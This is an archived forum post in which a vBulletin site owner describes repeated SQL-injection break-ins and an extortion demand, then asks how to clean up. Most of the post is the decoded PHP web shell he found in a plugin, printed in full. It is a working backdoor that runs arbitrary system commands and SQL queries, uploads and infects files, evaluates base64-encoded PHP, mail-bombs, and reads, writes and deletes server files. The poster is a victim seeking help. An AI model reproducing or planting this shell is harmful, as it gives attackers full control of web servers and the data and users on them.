vb.org Archive - View Single Post

lcp03o · #1 11-27-2011, 08:37 AM

Hi

My site www.computerforums.org was hacked a few weeks back by using the search function to search a group which then enabled them to run SQL injection and get my password ( http://www.youtube.com/watch?v=ztCFJvzv3NM )

There was a patch available to stop this threat so I restored the site from a backup and installed this patch (Which did fix the issue as I tested it). But yesterday they hacked me again. So I restored the database from a week back, then I deleted all files and only uploaded the latest version of VB files and performed an upgrade to the latest version of VB. (So i have a fresh upgraded install of VB)

But again today ive been hacked. I believe they have uploaded a shell program but I can not find it. I keek changing my passwords every few hours (Username + Hosting + SQL) but they keep getting back in. Any ideas what I can do??

The hacker has been sending me messages, this is what he has told me, I dont know if the below is true but this is what he is saying

-He is using an SQL injection hack to get it
-The vubrability is in the vbulletin files, all versions (But I uploaded fresh VB files and upgraded) could it be in the database somewhere?
-he wants money to stop the attacks

--------------- Added [DATE]1322388545[/DATE] at [TIME]1322388545[/TIME] ---------------

i have just found out that I have been hacked using this http://itsecbiz.blogspot.com/2011/07...f-you-got.html and I have decoded the file and it reads this

Quote:

@set_time_limit(0);$modearr=array("cmd","sql","inf ect","upload","ws_ver","ws_remove","ws_read","ws_s ave","ws_mail","ws_eval","ws_list","ws_homedir","w s_delete","ws_makedir","ws_rmdir","ws_down");$mode =$_REQUEST['mode'];if(in_array($mode,$modearr)){ function ws_stripslashes($string){if(get_magic_quotes_gpc() ){return StripSlashes($string);}else{return $string;}}if($mode=="cmd"){$cmd=$_REQUEST['cmd'];if(function_exists('system')){system($cmd);}elsei f(function_exists('exec')){exec($cmd,$output);fore ach($output as $line){echo$line."\n";}}elseif(function_exists('sh ell_exec')){$output=shell_exec($cmd);echo$output;} elseif(function_exists('popen')){$handle=popen($cm d,"r");$read=fread($handle,2096);echo$read;pclose( $handle);}}if($mode=="sql"){$host=$_REQUEST['host'];$port=$_REQUEST['port'];$username=$_REQUEST['username'];$password=$_REQUEST['password'];$dbname=$_REQUEST['dbname'];$query=$_REQUEST['query'];$link=mysql_connect($host.":".$port,$username,$pa ssword) or die('Could not connect: '.mysql_error());if($_REQUEST['sqlCmd']=="getDbs"){$db_list=mysql_list_dbs($link);while($ row=mysql_fetch_object($db_list)){echo"Database: ".$row->Database."\n";}mysql_free_result($db_list);}if($_ REQUEST['sqlCmd']=="getTables"){$result=mysql_list_tables($dbname); $num_rows=mysql_num_rows($result);for($i=0;$i<$num _rows;$i++){echo"Table: ".mysql_tablename($result,$i)."\n";}mysql_free_res ult($result);}if(isset($query)){mysql_select_db($d bname,$link) or die('Could not select database');$result=mysql_query(ws_stripslashes($qu ery)) or die("nInvalid query: ".mysql_error());while($row=mysql_fetch_assoc($res ult)){echo"Row {\n";foreach($row as $variable=>$value){echo$variable."=".$value."\n";} echo"\n}\n";}}mysql_close($link);}if($mode=="infec t"){$handle=fopen($_REQUEST["sourceFile"],"r+") or die("Error reading source file");$contents="";while(!feof($handle)){$content s.=fread($handle,8192);}fclose($handle);$handle=fo pen($_REQUEST['infectFile'],"r") or die("Error reading infect file");$contents2=$contents."\n";while(!feof($hand le)){$contents2.=fread($handle,8192);}fclose($hand le);$fp=fopen($_REQUEST['infectFile'],'w') or die("Error writing infect file");$write=fwrite($fp,$contents2);fclose($fp);i f($write){echo$_REQUEST['infectFile']." Infected";}}if($mode == "upload"){if($_FILES){if (is_uploaded_file($_FILES['file']['tmp_name'])){$uploadfile = basename($_FILES['file']['name']);if (move_uploaded_file($_FILES['file']['tmp_name'], $_REQUEST['dir'].$uploadfile)){echo $uploadfile." has been uploaded!.";}else{echo "Upload Failed!!!";}}}}if($mode=="ws_ver"){echo"WebShell PHP Server v3.2";}if($mode=="ws_remove"){$handle=fopen($_REQU EST["file"],"r+") or die("Error reading file");$contents="";while(!feof($handle)){$content s.=fread($handle,8192);}fclose($handle);$contents2 =preg_replace('/[<?\s]*eval.*\?>/si','',$contents);if($contents2){$fp=fopen($_REQUE ST['file'],'w') or die("Error writing file");$write=fwrite($fp,$contents2);fclose($fp);i f($write){echo"WebShell removed from ".$_REQUEST['file'];}}else{echo"Didnt Find Shell";}}if($mode=="ws_read"){$handle=fopen($_REQU EST['file'],"r") or die("Error with reading file");$contents="";while(!feof($handle)){$content s.=fread($handle,8192);}fclose($handle);echo$conte nts;}if($mode=="ws_save"){$contents=ws_stripslashe s($_REQUEST["contents"]);$fp=fopen($_REQUEST['file'],'w') or die("Error writing ".$_REQUEST['file']." file");$write=fwrite($fp,$contents);fclose($fp);if ($write){echo$_REQUEST['file']." saved";}}if($mode=="ws_mail"){$mailtimes="1";$head ers='From: '.ws_stripslashes($_REQUEST['from']).'';while($mailtimes<=$_REQUEST['times']){mail(ws_stripslashes($_REQUEST['to']),ws_stripslashes($_REQUEST['subject']),ws_stripslashes($_REQUEST['msg']),$headers);$mailtimes++;}echo"Mail Bomb Complete";}if($mode=="ws_eval"){$php=$_REQUEST['php'];eval(base64_decode(ws_stripslashes($php)));}if($m ode=="ws_list"){$dir=$_REQUEST['dir'];$hook=opendir($dir) or die('cant open dir');while(false!==($file=readdir($hook))){$fpath =$dir.$file;if(is_dir($fpath)){if($file!='.'&&$fil e!='..'){echo"Directory: ".$file."\n";}}if($file!='.'&&$file!='..'&&!is_dir ($fpath)){echo"File: ".$file."\n";}}}if($mode=="ws_homedir"){echo$_SERV ER["DOCUMENT_ROOT"];}if($mode=="ws_delete"){unlink($_REQUEST['file']) or die('Cant delete file');echo"File Deleted";}if($mode=="ws_makedir"){mkdir($_REQUEST['dir'],$_REQUEST['chmod']) or die('Cant create dir');echo"Directory Created";}if($mode=="ws_rmdir"){rmdir($_REQUEST['dir']) or die('Cant remove dir');echo"Directory Removed";}if($mode=="ws_down"){header('Content-type: application/octet-stream');header('Content-Disposition: attachment; filename='.$_REQUEST['file'].'');readfile($_REQUEST['file']);}die();}

I have disabled the plugin, is this enough??

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.01479 seconds Memory Usage 1,800KB Queries Executed 11 (?)
More Information
Template Usage: (1)SHOWTHREAD_SHOWPOST (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (1)bbcode_quote (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)post_thanks_box (1)post_thanks_button (1)post_thanks_javascript (1)post_thanks_navbar_search (1)post_thanks_postbit_info (1)postbit (1)postbit_onlinestatus (1)postbit_wrapper (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit reputationlevel showthread	Included Files: ./showpost.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/functions_bigthree.php ./includes/class_postbit.php ./includes/class_bbcode.php ./includes/functions_reputation.php ./includes/functions_post_thanks.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_postinfo_query fetch_postinfo fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete showpost_start bbcode_fetch_tags bbcode_create postbit_factory showpost_post postbit_display_start post_thanks_function_post_thanks_off_start post_thanks_function_post_thanks_off_end post_thanks_function_fetch_thanks_start post_thanks_function_fetch_thanks_end post_thanks_function_thanked_already_start post_thanks_function_thanked_already_end fetch_musername postbit_imicons bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete postbit_display_complete post_thanks_function_can_thank_this_post_start showpost_complete
Messages: